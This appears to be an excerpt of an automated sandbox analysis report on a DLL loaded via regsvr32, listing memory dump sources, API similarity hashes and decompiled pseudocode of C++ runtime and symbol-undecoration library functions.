                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180002810 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 680105476-0
                                                                                                              • Opcode ID: 8f2222f882755470ffb2c5da2b273b19dfc1ca7ac93733a7997ed64d3d7e7643
                                                                                                              • Instruction ID: c77b5e6d42d44c515596b01454ff7c37b1356d2e002381d1f7d9abbd5336824c
                                                                                                              • Opcode Fuzzy Hash: 8f2222f882755470ffb2c5da2b273b19dfc1ca7ac93733a7997ed64d3d7e7643
                                                                                                              • Instruction Fuzzy Hash: EBE0E225A5310E41FDEBF2A254563E621840B4D7F0E18EB207D76042C3AD14869F8310
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000E28C Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 68%
                                                                                                              			E0000000118000E28C() {
				void* _t1;
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t12;

				r8d = 0;
				_t1 = E0000000118000FA18(0xfa0, _t6, _t9, _t10, 0x800713e0, _t12); // executed
				if (_t1 == 0) goto 0x8000e2b2;
				 *0x80071408 =  *0x80071408 + 1;
				goto 0x8000e2b9;
				E0000000118000E2DC();
				return 0;
			}








                                                                                                              0x18000e290
                                                                                                              0x18000e29f
                                                                                                              0x18000e2a6
                                                                                                              0x18000e2a8
                                                                                                              0x18000e2b0
                                                                                                              0x18000e2b2
                                                                                                              0x18000e2bd

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalInitializeSection__vcrt_
                                                                                                              • String ID:
                                                                                                              • API String ID: 1804404742-0
                                                                                                              • Opcode ID: e0bc42959a5105edce769c9983d7327e314ac6e388738d042b340b942aa7a480
                                                                                                              • Instruction ID: a6a3f66403e328aea663cdd8fc56fda75e22559312f6cb48709170ff60abb4f0
                                                                                                              • Opcode Fuzzy Hash: e0bc42959a5105edce769c9983d7327e314ac6e388738d042b340b942aa7a480
                                                                                                              • Instruction Fuzzy Hash: 9BD0A73470039985F7E2B71158423E13314A74F3C2FE09011FD0851AD68E0D834EAB11
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Non-executed Functions

                                                                                                              Function 00000001800063E0 Relevance: 90.2, APIs: 36, Strings: 15, Instructions: 913COMMONLIBRARYCODECrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 21%
                                                                                                              			E000000011800063E0(signed int __rbx, signed int* __rcx, intOrPtr* __rdx) {
				void* __rdi;
				void* __rsi;
				void* __r12;
				void* __r14;
				intOrPtr _t426;
				signed int _t453;
				signed int _t460;
				signed long long _t483;
				intOrPtr _t487;
				unsigned int _t495;
				unsigned int _t504;
				unsigned int _t513;
				signed int _t527;
				unsigned int _t545;
				unsigned int _t553;
				signed int _t564;
				signed int _t569;
				signed int _t582;
				signed int _t583;
				signed int _t585;
				unsigned int _t592;
				signed int _t598;
				unsigned int _t600;
				signed int _t615;
				signed int _t654;
				signed int _t657;
				signed int _t658;
				void* _t663;
				void* _t668;
				void* _t736;
				void* _t740;
				void* _t744;
				void* _t747;
				void* _t748;
				signed int _t751;
				signed int _t752;
				signed int _t756;
				signed long long _t759;
				signed long long _t761;
				signed long long _t766;
				signed long long _t767;
				signed long long* _t768;
				signed long long* _t771;
				signed long long* _t774;
				signed long long _t778;
				signed long long _t795;
				signed long long _t796;
				signed long long* _t797;
				signed long long* _t798;
				void* _t801;
				signed long long _t819;
				signed long long _t823;
				signed long long* _t824;
				signed long long _t828;
				void* _t868;
				void* _t953;
				void* _t955;
				long long* _t956;
				void* _t958;
				void* _t959;
				void* _t961;
				void* _t962;
				void* _t990;
				void* _t991;
				void* _t992;
				void* _t994;
				void* _t996;
				void* _t998;
				intOrPtr* _t999;
				signed long long _t1002;

				 *((long long*)(_t961 + 8)) = __rbx;
				_t959 = _t961 - 0x20;
				_t962 = _t961 - 0x120;
				_t426 =  *0x80071308; // 0x0
				_t999 = __rdx;
				 *(_t962 + 0x40) =  *(_t962 + 0x40) & 0x00000000;
				_t956 = __rcx;
				 *((intOrPtr*)(_t959 - 0x68)) = _t426 -  *0x80071310;
				 *(_t962 + 0x48) = 0;
				_t658 = E0000000118000CBFC(__rcx, _t990, _t991);
				if ( *__rdx == 0) goto 0x8000643f;
				if (( *(__rdx + 8) & 0x00000200) == 0) goto 0x8000643f;
				 *(_t959 + 0x78) = 1;
				goto 0x80006442;
				 *(_t959 + 0x78) =  *(_t959 + 0x78) & 0;
				if (_t658 != 0xffff) goto 0x80006459;
				__rcx[2] = __rcx[2] & 0;
				 *__rcx =  *__rcx & __rbx;
				__rcx[2] = 2;
				goto 0x80007267;
				if (_t658 != 0xfffe) goto 0x80006486;
				 *(_t962 + 0x58) =  *(_t962 + 0x58) & 0;
				 *(_t962 + 0x50) = 0x8005f780;
				_t801 = _t962 + 0x50;
				0x80005f48();
				goto 0x80007267;
				_t663 = _t658 - 0xfffd;
				if (_t663 != 0) goto 0x8000649a;
				 *__rcx = 0x8005f780;
				goto 0x80007264;
				r14d = _t658;
				r13d = 0x6000;
				r14d = r14d & 0x00008000;
				if (_t663 == 0) goto 0x80006d31;
				r12d = _t658;
				r12d = r12d & 0x00001800;
				r13d = 0x1000;
				 *(_t959 + 0x70) = 0 | r12d == 0x00000800;
				 *(_t959 + 0x68) = 0 | (r13d & _t658) == 0x00000000;
				r13d =  ==  ? 0x400 : r13d;
				r13d = r13d & _t658;
				 *(_t959 - 0x6c) = r13d;
				if (r12d == 0x800) goto 0x80006514;
				_t30 = _t801 - 0x1000; // -4096
				if ((_t30 & 0xfffffcff) != 0) goto 0x80006514;
				_t668 = (_t658 & 0x00001b00) - 0x1300;
				if (_t668 != 0) goto 0x80006d2b;
				asm("bt edi, 0xe");
				if (_t668 >= 0) goto 0x8000658b;
				_t592 =  *0x80071318; // 0x0
				if (( !((_t592 >> 0x00000002 |  *0x80071318) >> 1) & 0x00000001) == 0) goto 0x80006578;
				0x80007af8();
				 *(_t962 + 0x70) =  *(_t962 + 0x70) & 0x00000000;
				 *(_t962 + 0x78) =  *(_t962 + 0x78) & 0x00000000;
				E00000001180007320(0x20, 0x8005f780, 0x8005f780, _t962 + 0x70);
				0x80005f48();
				_t759 =  *(_t962 + 0x50);
				 *(_t962 + 0x40) = _t759;
				goto 0x80006587;
				0x80007af8();
				if ( *(_t759 + 8) - 1 <= 0) goto 0x8000658b;
				 *(_t962 + 0x48) =  *(_t759 + 8) & 0x000000ff;
				if (r13d == 0) goto 0x80006717;
				if (r12d != 0x1800) goto 0x80006717;
				r8b = 0x7b;
				0x80005f74();
				_t795 = _t759;
				E000000011800090E8(0, _t795, _t962 + 0x30, _t953, __rcx, _t996);
				0x80005f48();
				E0000000118000D1B8(E00000001180006090(0, _t962 + 0x40, _t759, _t962 + 0x30), _t962 + 0x30);
				if (( *0x80071318 & 0x00001000) != 0) goto 0x80006663;
				 *(_t962 + 0x70) =  *(_t962 + 0x70) & 0x00000000;
				 *(_t962 + 0x78) =  *(_t962 + 0x78) & 0x00000000;
				 *(_t962 + 0x50) = "}\' ";
				r13d = 3;
				 *(_t962 + 0x58) = r13d;
				asm("movaps xmm0, [esp+0x50]");
				asm("movdqa [esp+0x50], xmm0");
				E00000001180007320(0x2c, "}\' ", _t795, _t962 + 0x70);
				0x80005f48();
				0x80005f1c();
				E00000001180006090(0, _t962 + 0x40, "}\' ", _t962 + 0x50);
				_t761 = "}\'";
				 *(_t962 + 0x58) = 2;
				 *(_t962 + 0x50) = _t761;
				asm("movaps xmm0, [esp+0x50]");
				asm("movdqa [esp+0x30], xmm0");
				E00000001180006010(_t761, _t795, _t962 + 0x40, _t962 + 0x30);
				E000000011800082DC(_t795, _t962 + 0x30, _t953, _t998, _t996);
				_t598 =  *0x80071318; // 0x0
				if (( !(_t598 >> 1) & 0x00000001) == 0) goto 0x8000670f;
				if (( !(_t598 >> 4) & 0x00000001) == 0) goto 0x8000670f;
				if ((0x00001000 & _t598) != 0) goto 0x8000670f;
				 *(_t962 + 0x70) =  *(_t962 + 0x70) & 0x00000000;
				 *(_t962 + 0x78) =  *(_t962 + 0x78) & 0x00000000;
				E00000001180007320(0x20, _t761, _t795, _t962 + 0x70);
				0x80005f48();
				r8b = 0x20;
				0x80005f74();
				_t819 = _t761;
				0x80005f48();
				goto 0x80006f91;
				goto 0x80006fa0;
				 *(_t959 - 0x40) = _t819;
				 *(_t959 - 0x38) = _t598;
				 *(_t959 - 0x50) = _t819;
				 *(_t959 - 0x48) = _t598;
				 *(_t959 - 0x60) = _t819;
				 *(_t959 - 0x58) = _t598;
				 *(_t962 + 0x70) = _t819;
				 *(_t962 + 0x78) = _t598;
				 *(_t959 - 0x30) = _t819;
				 *(_t959 - 0x28) = _t598;
				if (r13d == 0) goto 0x800067d9;
				if (r12d != 0x800) goto 0x800067b9;
				if ((_t658 & 0x00000700) != 0x600) goto 0x80006796;
				E000000011800090E8(1, _t795, _t962 + 0x50, _t953, _t956, _t996);
				 *(_t959 - 0x40) =  *(_t962 + 0x50);
				 *(_t959 - 0x38) =  *(_t962 + 0x58);
				E000000011800090E8(1, _t795, _t962 + 0x50, _t953, _t956, _t996);
				 *(_t959 - 0x50) =  *(_t962 + 0x50);
				_t453 =  *(_t962 + 0x58);
				 *(_t959 - 0x48) = _t453;
				goto 0x8000679d;
				if (_t453 != 0x500) goto 0x800067b9;
				E000000011800090E8(1, _t795, _t962 + 0x50, _t953, _t956, _t996);
				 *(_t959 - 0x60) =  *(_t962 + 0x50);
				 *(_t959 - 0x58) =  *(_t962 + 0x58);
				_t823 = _t962 + 0x50;
				E000000011800090E8(1, _t795, _t823, _t953, _t956, _t996);
				 *(_t962 + 0x70) =  *(_t962 + 0x50);
				 *(_t962 + 0x78) =  *(_t962 + 0x58);
				if (r12d != 0x800) goto 0x80006867;
				if ((_t658 & 0x00000700) == 0x200) goto 0x80006867;
				_t460 =  *0x80071318; // 0x0
				r8d = 0;
				 *(_t962 + 0x50) = _t823;
				 *(_t962 + 0x58) = 0;
				 *(_t962 + 0x20) = 1;
				if ((_t460 & 0x00000060) == 0x60) goto 0x8000683e;
				 *(_t959 - 0x80) = _t823;
				 *(_t959 - 0x78) = 0;
				_t132 = _t959 - 0x80; // 0xf80
				_t824 = _t962 + 0x30;
				E0000000118000841C(_t795, _t824, _t132, _t953, _t956, _t962 + 0x50);
				_t766 =  *(_t962 + 0x30);
				 *(_t959 - 0x30) = _t766;
				goto 0x80006864;
				 *(_t962 + 0x30) = _t824;
				 *(_t962 + 0x38) = 0;
				_t141 = _t959 - 0x80; // 0xf80
				E0000000118000841C(_t795, _t141, _t962 + 0x50, _t953, _t956, _t962 + 0x30);
				if ( *(_t959 - 0x78) - 1 <= 0) goto 0x80006867;
				 *(_t959 - 0x28) =  *(_t959 - 0x78) & 0x000000ff;
				_t600 =  *0x80071318; // 0x0
				r13d = 3;
				if (( !(_t600 >> 1) & 0x00000001) == 0) goto 0x80006932;
				_t602 =  !(_t600 >> 4);
				if (( !(_t600 >> 4) & 0x00000001) == 0) goto 0x80006909;
				E000000011800082DC(_t795, _t962 + 0x30, _t953, _t994, _t992);
				0x80005f48();
				_t828 =  *_t766;
				 *(_t962 + 0x40) = _t828;
				 *(_t962 + 0x48) =  *(_t766 + 8);
				_t767 =  *_t999;
				if (_t767 == 0) goto 0x80006946;
				if (_t828 == 0) goto 0x80006939;
				if (( *0x80071318 & 0x00001000) != 0) goto 0x80006939;
				 *(_t959 - 0x80) = _t795;
				_t158 = _t959 - 0x80; // -125
				 *(_t959 - 0x78) = 0;
				E00000001180007320(0x20, _t767, _t795, _t158);
				0x80005f48();
				E00000001180006090( !(_t600 >> 4), _t962 + 0x40, _t962 + 0x30, _t999);
				goto 0x80006946;
				E000000011800082DC(_t795, _t962 + 0x40, _t953, _t953, _t955);
				if ( *(_t962 + 0x48) == r13b) goto 0x800068b6;
				if ( *(_t767 + 8) - 1 <= 0) goto 0x800068b6;
				 *(_t962 + 0x48) = 0;
				goto 0x800068b6;
				goto 0x80006909;
				 *(_t962 + 0x40) = _t767;
				 *(_t962 + 0x48) =  *(_t999 + 8);
				 *(_t959 - 0x80) = _t795;
				 *(_t959 - 0x70) = 0;
				if ( *(_t959 + 0x78) == (0 |  *(_t767 + 8) & 0x000000ff)) goto 0x80006a64;
				_t176 = _t959 - 0x10; // -13
				E0000000118000B584(_t176);
				 *(_t962 + 0x50) =  *(_t962 + 0x50) & _t795;
				 *(_t962 + 0x58) =  *(_t962 + 0x58) & r15d;
				_t796 = _t767;
				E00000001180007320(0x20, _t767, _t796, _t962 + 0x50);
				0x80005f48();
				E00000001180006090( !(_t600 >> 4), _t962 + 0x40, _t962 + 0x30, _t796);
				if (( *0x80071318 & 0x00001000) != 0) goto 0x80007258;
				if ( *(_t959 - 0x6c) == 0) goto 0x80006b77;
				if (r12d != 0x800) goto 0x80006b0c;
				if ((_t658 & 0x00000700) != 0x600) goto 0x80006aa6;
				 *(_t962 + 0x38) = 0xc;
				_t768 = "`vtordispex{";
				 *(_t962 + 0x30) = _t768;
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				0x800059cc();
				0x80005f48();
				r8b = 0x2c;
				0x80005f74();
				0x80005f48();
				r8b = 0x2c;
				0x80005f74();
				0x80005f48();
				goto 0x80006af5;
				E0000000118000A0A4(_t768, _t796, 0x80071330, _t962 + 0x60, _t956, _t958);
				if (_t768 == 0) goto 0x80006a85;
				 *_t768 = _t796;
				_t768[1] = 0;
				goto 0x80006a88;
				_t1002 = _t796;
				_t203 = _t959 - 0x10; // -13
				E0000000118000B584(_t203);
				_t483 = _t768[1];
				 *(_t959 - 0x80) =  *_t768;
				 *(_t959 - 0x70) = _t483;
				goto 0x800069b0;
				if (_t483 != 0x500) goto 0x80006b0c;
				 *(_t962 + 0x38) = 0xa;
				 *(_t962 + 0x30) = "`vtordisp{";
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				0x800059cc();
				_t211 = _t959 - 0x60; // -93
				0x80005f48();
				r8b = 0x2c;
				0x80005f74();
				E00000001180006090( !(_t600 >> 4), _t962 + 0x40, "`vtordisp{", _t211);
				goto 0x80006b3a;
				 *(_t962 + 0x38) = 0xa;
				 *(_t962 + 0x30) = "`adjustor{";
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				E00000001180006010("`adjustor{", _t796, _t962 + 0x40, _t962 + 0x30);
				 *(_t962 + 0x38) = r13d;
				_t771 = "}\' ";
				 *(_t962 + 0x30) = _t771;
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				0x80005f1c();
				E00000001180006090(_t602, _t962 + 0x40, _t771, _t962 + 0x30);
				if ( *0x8007132c != 1) goto 0x80006b92;
				_t487 =  *0x80071328; // 0x0
				_t488 =  ==  ?  *((void*)(_t959 - 0x68)) : _t487;
				 *0x80071328 =  ==  ?  *((void*)(_t959 - 0x68)) : _t487;
				E000000011800075F0(_t796, _t962 + 0x60, _t771, _t962 + 0x30);
				 *(_t962 + 0x50) =  *(_t962 + 0x50) & 0x00000000;
				 *(_t962 + 0x58) =  *(_t962 + 0x58) & 0x00000000;
				_t797 = _t771;
				E00000001180007320(0x28, _t771, _t797, _t962 + 0x50);
				_t979 = _t797;
				0x80005f48();
				r8b = 0x29;
				0x80005f74();
				E00000001180006090(_t602, _t962 + 0x40, _t771, _t797);
				if (r12d != 0x800) goto 0x80006c0b;
				if ((_t658 & 0x00000700) == 0x200) goto 0x80006c0b;
				_t238 = _t959 - 0x30; // -45
				E00000001180006090(_t602, _t962 + 0x40, _t238, _t797);
				_t495 =  *0x80071318; // 0x0
				if ((0x00000001 &  !(_t495 >> 0x13)) == 0) goto 0x80006c38;
				E0000000118000B3B8(1, _t602, _t797, _t962 + 0x60, _t953, _t956);
				E00000001180006090(_t602, _t962 + 0x40, _t771, _t797);
				goto 0x80006c5d;
				E0000000118000B3B8(1, _t602, _t797, _t962 + 0x40, _t953, _t956);
				if ( *(_t962 + 0x48) == r13b) goto 0x80006c5d;
				if (_t771[1] - 1 <= 0) goto 0x80006c5d;
				 *(_t962 + 0x48) =  *(_t962 + 0x48) & 0xffffff00 | _t771[1] & 0x000000ff;
				E0000000118000A148(_t771[1] & 0x000000ff, _t962 + 0x60);
				E00000001180006090( *(_t962 + 0x48) & 0xffffff00 | _t771[1] & 0x000000ff, _t962 + 0x40, _t771, _t797);
				_t504 =  *0x80071318; // 0x0
				if ((0x00000001 &  !(_t504 >> 8)) == 0) goto 0x80006c9c;
				E0000000118000CBD8(_t962 + 0x60);
				E00000001180006090( *(_t962 + 0x48) & 0xffffff00 | _t771[1] & 0x000000ff, _t962 + 0x40, _t771, _t797);
				goto 0x80006cc1;
				E0000000118000CBD8(_t962 + 0x40);
				if ( *(_t962 + 0x48) == r13b) goto 0x80006cc1;
				if (_t771[1] - 1 <= 0) goto 0x80006cc1;
				 *(_t962 + 0x48) =  *(_t962 + 0x48) & 0xffffff00 | _t771[1] & 0x000000ff;
				E00000001180009234(_t771[1] & 0x000000ff, _t962 + 0x60);
				if ( *(_t962 + 0x48) == r13b) goto 0x80006ceb;
				if (_t771[1] - 1 <= 0) goto 0x80006ceb;
				 *(_t962 + 0x48) =  *(_t962 + 0x48) & 0xffffff00 | _t771[1] & 0x000000ff;
				_t513 =  *0x80071318; // 0x0
				if ((0x00000001 &  !(_t513 >> 2)) == 0) goto 0x8000670f;
				if (_t1002 == 0) goto 0x8000670f;
				 *_t1002 =  *(_t962 + 0x40);
				 *(_t1002 + 8) =  *(_t962 + 0x48);
				 *(_t962 + 0x40) =  *(_t959 - 0x80);
				goto 0x80006f9c;
				r13d = 0x6000;
				_t868 = _t962 + 0x40;
				E00000001180006090( *(_t962 + 0x48) & 0xffffff00 | _t771[1] & 0x000000ff, _t868, _t1002, _t979);
				r9d = 0x7c00;
				if (r14d != 0) goto 0x80006ddc;
				_t276 = _t868 - 0x6800; // -26624
				if ((_t276 & 0xfffff7ff) != 0) goto 0x80006d71;
				E0000000118000D490(0x28, _t797, _t956, _t962 + 0x40, _t953, _t956, _t979, _t992);
				goto 0x80007267;
				if ((_t658 & r9d) != r13d) goto 0x80006ddc;
				_t774 = "}\'";
				 *(_t962 + 0x38) = 2;
				 *(_t962 + 0x30) = _t774;
				asm("movaps xmm0, [esp+0x30]");
				r8b = 0x7b;
				asm("movdqa [esp+0x50], xmm0");
				0x80005f74();
				_t798 = _t774;
				E000000011800090E8(0, _t798, _t962 + 0x30, _t953, _t956, _t996);
				0x80005f48();
				0x80005f1c();
				goto 0x80007267;
				if ((_t658 & 0x0000fc00) != r9d) goto 0x80006dfa;
				E0000000118000D414(_t658 & r9d, 0, (_t658 & 0x0000fc00) - r9d, _t956, _t962 + 0x40, _t953, _t956, _t962 + 0x50, _t992);
				goto 0x80007267;
				r12d = _t658;
				r12d = r12d & 0x00001800;
				r15d = 0x1200;
				_t615 = 0 | r12d == 0x00000800;
				 *(_t959 + 0x70) = _t615;
				r13d = 0x1100;
				_t582 =  *(_t959 + 0x68) & 0xffffff00 | (r13d & _t658) == 0x00000000;
				_t526 =  !=  ? _t615 : _t582;
				_t527 =  ~( !=  ? _t615 : _t582);
				asm("sbb edx, edx");
				if (r14d == 0) goto 0x80006f00;
				r8d = _t658;
				r8d = r8d & 0x00001b00;
				asm("sbb eax, eax");
				if (((0 | r8d == 0x00001000) &  ~r14d) == 0) goto 0x80006e99;
				 *(_t962 + 0x38) = 0x20;
				 *(_t962 + 0x30) = "`local static destructor helper\'";
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				E00000001180006010("`local static destructor helper\'", _t798, _t962 + 0x40, _t962 + 0x30);
				goto 0x80006f19;
				asm("sbb eax, eax");
				if (((0 | r8d == r13d) &  ~r14d) == 0) goto 0x80006edc;
				 *(_t962 + 0x38) = 0x30;
				 *(_t962 + 0x30) = "`template static data member constructor helper\'";
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				E00000001180006010("`template static data member constructor helper\'", _t798, _t962 + 0x40, _t962 + 0x30);
				goto 0x80006f47;
				asm("sbb eax, eax");
				if (((0 | r8d == r15d) &  ~r14d) == 0) goto 0x80006f00;
				 *(_t962 + 0x38) = 0x2f;
				goto 0x80006ebb;
				if (r14d != 0) goto 0x80006f15;
				if ((_t658 & r9d) == 0x7800) goto 0x80007258;
				if ((0x1000 & _t658) == 0) goto 0x80006f82;
				_t654 = _t658 & 0x00001b00;
				asm("sbb eax, eax");
				if (((0 | _t654 == r13d) &  ~r14d) != 0) goto 0x80006f47;
				asm("sbb eax, eax");
				if (((0 | _t654 == r15d) &  ~r14d) == 0) goto 0x80006f82;
				 *(_t962 + 0x50) =  *(_t962 + 0x50) & 0x00000000;
				 *(_t962 + 0x58) =  *(_t962 + 0x58) & 0x00000000;
				E00000001180007320(0x20, "`template static data member destructor helper\'", _t798, _t962 + 0x50);
				0x80005f48();
				_t778 =  *(_t962 + 0x30);
				 *(_t962 + 0x40) = _t778;
				goto 0x80006f9c;
				0x800097cc();
				 *(_t962 + 0x40) =  *_t778;
				 *(_t962 + 0x48) =  *(_t778 + 8);
				r13d = 0xb;
				_t583 =  !=  ?  *(_t959 + 0x70) : _t582;
				 *(_t959 + 0x68) = _t583;
				r15d = _t994 - 3;
				if (_t583 == 0) goto 0x80007196;
				_t545 =  *0x80071318; // 0x0
				if (( !(_t545 >> 9) & 0x00000001) == 0) goto 0x800070c1;
				_t585 = _t658 & 0x00000700;
				_t736 = _t585 - 0x200;
				_t549 =  !=  ? _t736 == 0 : _t994 - 0xa;
				_t738 =  !=  ? _t736 == 0 : _t994 - 0xa;
				if (( !=  ? _t736 == 0 : _t994 - 0xa) == 0) goto 0x80007044;
				 *(_t962 + 0x38) = 7;
				 *(_t962 + 0x30) = "static ";
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				0x800059cc();
				0x80005f48();
				 *(_t962 + 0x40) =  *(_t962 + 0x30);
				 *(_t962 + 0x48) =  *(_t962 + 0x38);
				if (r14d == 0) goto 0x80007051;
				_t740 = _t585 - 0x100;
				if (_t740 == 0) goto 0x8000706c;
				asm("bt edi, 0xa");
				if (_t740 >= 0) goto 0x800070bb;
				_t359 = _t798 - 0x400; // 0xe00
				if ((_t359 & 0xfffffcff) != 0) goto 0x800070bb;
				if (_t585 == 0x700) goto 0x800070bb;
				 *(_t962 + 0x38) = r15d;
				 *(_t962 + 0x30) = "virtual ";
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				0x800059cc();
				0x80005f48();
				 *(_t962 + 0x40) =  *(_t962 + 0x30);
				 *(_t962 + 0x48) =  *(_t962 + 0x38);
				_t553 =  *0x80071318; // 0x0
				if (( !(_t553 >> 7) & 0x00000001) == 0) goto 0x80007196;
				_t657 = _t658 & 0x000000c0;
				_t744 = _t657 - 0x40;
				_t630 =  !=  ? _t744 == 0 :  *(_t959 + 0x70);
				_t746 =  !=  ? _t744 == 0 :  *(_t959 + 0x70);
				if (( !=  ? _t744 == 0 :  *(_t959 + 0x70)) == 0) goto 0x800070ff;
				 *(_t962 + 0x38) = 9;
				goto 0x80007153;
				_t747 = _t657 - 0x80;
				_t748 = r12d - 0x1000;
				_t560 =  !=  ? _t747 == 0 : _t748 == 0;
				_t750 =  !=  ? _t747 == 0 : _t748 == 0;
				if (( !=  ? _t747 == 0 : _t748 == 0) == 0) goto 0x8000712e;
				 *(_t962 + 0x38) = r13d;
				goto 0x80007153;
				_t751 = _t657;
				_t752 = r12d;
				_t563 =  !=  ? _t751 == 0 : _t752 == 0;
				_t754 =  !=  ? _t751 == 0 : _t752 == 0;
				if (( !=  ? _t751 == 0 : _t752 == 0) == 0) goto 0x80007196;
				 *(_t962 + 0x38) = r15d;
				 *(_t962 + 0x30) = "public: ";
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				0x800059cc();
				0x80005f48();
				 *(_t962 + 0x40) =  *(_t962 + 0x30);
				_t564 =  *(_t962 + 0x38);
				 *(_t962 + 0x48) = _t564;
				asm("sbb eax, eax");
				if ((_t658 & (_t564 & 0xfffff400) + 0x00001000) == 0) goto 0x80007203;
				_t756 =  *0x80071318 & 0x00001000;
				if (_t756 != 0) goto 0x80007203;
				 *(_t962 + 0x38) = r15d;
				 *(_t962 + 0x30) = "[thunk]:";
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				0x800059cc();
				0x80005f48();
				 *(_t962 + 0x40) =  *(_t962 + 0x30);
				 *(_t962 + 0x48) =  *(_t962 + 0x38);
				asm("bt edi, 0x10");
				if (_t756 >= 0) goto 0x80007258;
				 *(_t962 + 0x38) = r13d;
				 *(_t962 + 0x30) = "extern \"C\" ";
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm0");
				0x800059cc();
				0x80005f48();
				 *(_t962 + 0x40) =  *(_t962 + 0x30);
				 *(_t962 + 0x48) =  *(_t962 + 0x38);
				 *_t956 =  *(_t962 + 0x40);
				_t569 =  *(_t962 + 0x48);
				 *(_t956 + 8) = _t569;
				return _t569;
			}









































































                                                                                                              0x1800063e0
                                                                                                              0x1800063f0
                                                                                                              0x1800063f5
                                                                                                              0x1800063fc
                                                                                                              0x18000640a
                                                                                                              0x18000640d
                                                                                                              0x180006413
                                                                                                              0x180006416
                                                                                                              0x180006419
                                                                                                              0x180006422
                                                                                                              0x18000642a
                                                                                                              0x180006434
                                                                                                              0x180006436
                                                                                                              0x18000643d
                                                                                                              0x18000643f
                                                                                                              0x180006448
                                                                                                              0x18000644a
                                                                                                              0x18000644d
                                                                                                              0x180006450
                                                                                                              0x180006454
                                                                                                              0x18000645f
                                                                                                              0x180006461
                                                                                                              0x18000646f
                                                                                                              0x180006477
                                                                                                              0x18000647c
                                                                                                              0x180006481
                                                                                                              0x180006486
                                                                                                              0x18000648c
                                                                                                              0x18000648e
                                                                                                              0x180006495
                                                                                                              0x18000649a
                                                                                                              0x1800064a2
                                                                                                              0x1800064a8
                                                                                                              0x1800064af
                                                                                                              0x1800064b9
                                                                                                              0x1800064bc
                                                                                                              0x1800064d0
                                                                                                              0x1800064d6
                                                                                                              0x1800064e3
                                                                                                              0x1800064e6
                                                                                                              0x1800064ea
                                                                                                              0x1800064ed
                                                                                                              0x1800064f1
                                                                                                              0x1800064fb
                                                                                                              0x180006506
                                                                                                              0x180006508
                                                                                                              0x18000650e
                                                                                                              0x180006514
                                                                                                              0x180006518
                                                                                                              0x18000651a
                                                                                                              0x180006535
                                                                                                              0x180006537
                                                                                                              0x18000653c
                                                                                                              0x180006547
                                                                                                              0x180006551
                                                                                                              0x180006563
                                                                                                              0x180006568
                                                                                                              0x180006571
                                                                                                              0x180006576
                                                                                                              0x180006578
                                                                                                              0x180006581
                                                                                                              0x180006587
                                                                                                              0x180006590
                                                                                                              0x18000659d
                                                                                                              0x1800065a3
                                                                                                              0x1800065ae
                                                                                                              0x1800065ba
                                                                                                              0x1800065bd
                                                                                                              0x1800065cf
                                                                                                              0x1800065e6
                                                                                                              0x1800065f6
                                                                                                              0x1800065f8
                                                                                                              0x180006605
                                                                                                              0x18000660f
                                                                                                              0x180006614
                                                                                                              0x18000661a
                                                                                                              0x180006621
                                                                                                              0x180006626
                                                                                                              0x18000662c
                                                                                                              0x18000663f
                                                                                                              0x180006651
                                                                                                              0x18000665e
                                                                                                              0x180006663
                                                                                                              0x18000666a
                                                                                                              0x180006672
